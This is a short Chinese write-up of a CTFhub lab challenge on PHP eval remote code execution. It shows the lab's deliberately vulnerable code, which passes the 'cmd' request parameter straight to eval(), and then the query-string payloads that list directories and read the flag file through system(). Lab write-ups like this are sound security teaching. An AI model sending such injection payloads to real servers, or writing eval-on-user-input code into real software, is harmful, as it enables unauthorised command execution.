CTFhub-RCE-evel执行

携柺星年2023-11-13 11:42

访问目标地址:

<?php

if (isset($_REQUEST['cmd'])) {

eval($_REQUEST["cmd"]);

} else {

highlight_file(FILE);

}

?>

根据PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");
!切记最后的分号不可省略!

没有需要的文件

看看上一级的文件夹 /?cmd=system("ls /");
!切记最后的分号不可省略!

打开flag文件发现FLAG /?cmd=system("cat /flag_8668");
!切记最后的分号不可省略!

相关推荐
小池先生7 分钟前
Gradle vs Maven 详细对比
java·maven
烛阴12 分钟前
隐式vs显式:解密C#类型转换的底层逻辑
前端·c#
q***239212 分钟前
基于SpringBoot和PostGIS的云南与缅甸的千里边境线实战
java·spring boot·spring
Fantasydg12 分钟前
AJAX JSON学习
前端·学习·ajax
q***787823 分钟前
Spring Boot的项目结构
java·spring boot·后端
瓢儿菜201843 分钟前
Web开发:什么是 HTTP 状态码?
前端·网络协议·http
q***96581 小时前
Spring Data JDBC 详解
java·数据库·spring
Kuo-Teng1 小时前
LeetCode 118: Pascal‘s Triangle
java·算法·leetcode·职场和发展·动态规划
1024小神1 小时前
swiftui使用WKWebView加载自签的https服务,允许不安全访问
前端
倚肆1 小时前
HttpServletResponse 与 ResponseEntity 详解
java·后端·spring
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03BongoCat - 跨平台键盘猫动画工具04安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)05Linux下V2Ray安装配置指南06jdk21下载、安装(Windows、Linux、macOS)07《大数据技术原理与应用》实验报告三 熟悉HBase常用操作08综合整理:pdf预览显示:你尝试预览的文件可能对你的计算机有害。如果你信任此文件以及其来源,请打开此文件以看其内容,如何解决以正常预览文件09使用国内镜像网站在线下载安装Qt(解决官网慢的问题)——Qt10Labelme从安装到标注:零基础完整指南